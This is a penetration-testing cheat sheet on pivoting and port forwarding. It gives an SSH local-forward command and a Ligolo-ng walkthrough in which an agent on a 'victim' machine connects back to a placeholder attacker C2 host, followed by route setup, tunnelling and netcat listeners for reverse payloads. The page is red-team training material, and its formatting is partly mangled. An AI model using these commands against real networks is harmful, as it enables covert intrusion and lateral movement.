Pivoting & Portforwarding
Lateral Movement consists of techniques that adversaries use to enter and control remote systems on a network.
SSH
ssh -L 8080:acuity@203.0.113.50:8080 # Local portforwardligolo-ng
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
./proxy -h # Help options
./proxy -autocert # Automatically request LetsEncrypt certificatesUsing Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
./agent -connect attacker_c2_server.com:11601If you want to tunnel the connection over a SOCKS5 proxy, you can use the
--socks ip:portoption. You can specify SOCKS credentials using the--socks-userand--socks-passarguments.
A session should appear on the proxy server.
INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"Use the session command to select the agent.
session command to select the agent.ligolo-ng Β» session
Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000Add a route on the proxy/relay server to the 192.168.0.0/24 agent network.
Linux:
sudo ip route add 192.168.0.0/24 dev ligoloWindows:
netsh int ipv4 show interfaces
Idx MΓ©t MTU Γtat Nom
--- ---------- ---------- ------------ ---------------------------
25 5 65535 connected ligolo
route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]Start the tunnel on the proxy
[Agent : nchatelain@nworkstation] Β» start_tunnel
[Agent : nchatelain@nworkstation] Β» INFO[0690] Starting tunnel to nchatelain@nworkstation Agent Binding/Listening
You can listen to ports on the agent and redirect connections to your control/proxy server.
In a ligolo session, use the listener_add command.
The following example will create a TCP listening socket on the agent (0.0.0.0:1234) and redirect connections to the 4321 port of the proxy server.
[Agent : nchatelain@nworkstation] Β» listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4321 --tcp
INFO[1208] Listener created on remote agent! On the proxy:
$ nc -lvp 4321When a connection is made on the TCP port 1234 of the agent, nc will receive the connection.
This is very useful when using reverse tcp/udp payloads.
You can view currently running listeners using the listener_list command and stop them using the listener_stop [ID] command:
[Agent : nchatelain@nworkstation] Β» listener_list
βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β Active listeners β
βββββ¬ββββββββββββββββββββββββββ¬βββββββββββββββββββββββββ¬βββββββββββββββββββββββββ€
β # β AGENT β AGENT LISTENER ADDRESS β PROXY REDIRECT ADDRESS β
βββββΌββββββββββββββββββββββββββΌβββββββββββββββββββββββββΌβββββββββββββββββββββββββ€
β 0 β nchatelain@nworkstation β 0.0.0.0:1234 β 127.0.0.1:4321 β
βββββ΄ββββββββββββββββββββββββββ΄βββββββββββββββββββββββββ΄βββββββββββββββββββββββββ
[Agent : nchatelain@nworkstation] Β» listener_stop 0
INFO[1505] Listener closed. Last updated